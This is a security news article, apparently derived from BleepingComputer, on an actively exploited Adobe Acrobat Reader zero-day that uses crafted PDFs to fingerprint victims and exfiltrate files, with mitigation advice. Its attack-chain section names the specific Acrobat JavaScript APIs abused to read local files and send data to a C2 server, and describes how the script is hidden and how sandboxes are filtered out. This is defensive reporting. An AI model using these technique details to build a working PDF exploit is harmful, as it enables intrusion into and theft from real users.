Security researchers have uncovered an actively exploited zero-day vulnerability in Adobe Acrobat Reader that has been weaponized in the wild since at least November 28, 2025 — over four months before the flaw was publicly identified. The exploit uses maliciously crafted PDF documents to fingerprint victim systems, bypass sandbox protections, and exfiltrate sensitive data, with no patch currently available from Adobe.
Discovery
The vulnerability was identified by Haifei Li of EXPMON, a public automated exploit analysis service, on March 26, 2026, after a suspicious PDF named yummy_adobe_exploit_uwu.pdf was submitted to the platform. Li confirmed that the exploit leverages a previously unknown logic flaw and works against the latest version of Adobe Reader with no user interaction required beyond opening the file.
Subsequent analysis identified an earlier sample — Invoice540.pdf — uploaded to VirusTotal on November 28, 2025, and a second sample on March 23, 2026, indicating the campaign had been quietly operating for months before detection.
How the Exploit Works
The attack chain exploits an unpatched logic flaw in Adobe Reader's JavaScript engine that allows untrusted PDF code to invoke privileged Acrobat APIs from within the sandboxed process — a fundamental sandbox bypass.
Attack Chain:
- Delivery — Victim opens a malicious PDF (social engineering implied by file naming)
- Obfuscation — Core exploit script is Base64-encoded and hidden within PDF objects
- Sandbox bypass — JavaScript engine flaw invokes privileged APIs from within sandbox
- Data collection — Exploits
util.readFileIntoStream()to read arbitrary local files - Exfiltration — Uses
RSS-addFeed()API to silently transmit stolen data to attacker C2 - Filtering — C2 server returns empty responses to sandbox environments, delivering real payloads only to genuine victims
The data collected in the initial fingerprinting phase includes:
- Exact operating system version and details
- System language settings
- Adobe Reader version number
- Local file path of the PDF document
This fingerprinting data allows threat actors to profile targeted victims before potentially delivering more destructive follow-on payloads.
Escalation Potential
Li emphasized that the exploit's capabilities extend well beyond initial reconnaissance:
"Even more concerning, this exploit allows the threat actor to not only collect/steal local information but also potentially launch subsequent RCE/SBX attacks, which could lead to full control of the victim's system."
The multi-stage design — fingerprinting first, payload delivery second — is consistent with targeted attack operations that need to verify victim identity before deploying high-value tools that could expose the campaign if deployed broadly.
Targeting Indicators
Independent researcher Gi7w0rm found that lure documents tied to the exploit contain Russian-language content referencing current events in Russia's oil and gas sector. While this does not establish definitive attribution, it suggests the campaign is targeting a specific audience rather than conducting opportunistic mass exploitation.
The targeting profile is consistent with industrial espionage or nation-state reconnaissance operations focused on energy sector entities.
Detection Challenges
A significant concern highlighted by researchers is how poorly traditional antivirus engines are detecting this threat. Samples submitted to VirusTotal showed very low detection rates, meaning most endpoint security tools are not flagging the malicious PDFs.
This is consistent with the exploit-only nature of the attack — the payload is an exploit mechanism, not a traditional malware binary — which means signature-based detection engines struggle to classify the threat.
Patch Status
As of April 9, 2026, Adobe has not released a patch for this vulnerability. EXPMON states it has notified Adobe Security and is awaiting their response.
Until a patch is available, security teams should consider:
| Mitigation | Description |
|---|---|
| PDF sandbox hardening | Ensure Adobe Reader's Protected Mode / Protected View is enabled |
| Disable JavaScript in Reader | Edit → Preferences → JavaScript → uncheck "Enable Acrobat JavaScript" |
| Alternative PDF readers | Use alternative PDF readers for untrusted documents |
| Submit suspicious PDFs | Use EXPMON's public service to analyze suspect PDF files |
| Email gateway filtering | Increase scrutiny on PDF attachments in email security policies |
| EDR behavioral monitoring | Watch for unusual Adobe Reader API calls and outbound network connections |
Industry Implications
This vulnerability underscores a broader challenge for organizations that rely on PDFs as a core business document format: the attack surface for PDF-based exploits remains significant even with sandboxing enabled, and the dwell time of four-plus months before discovery demonstrates how advanced campaigns can remain undetected in widely-deployed enterprise software.
Source: BleepingComputer — Hackers exploiting Acrobat Reader zero-day flaw since December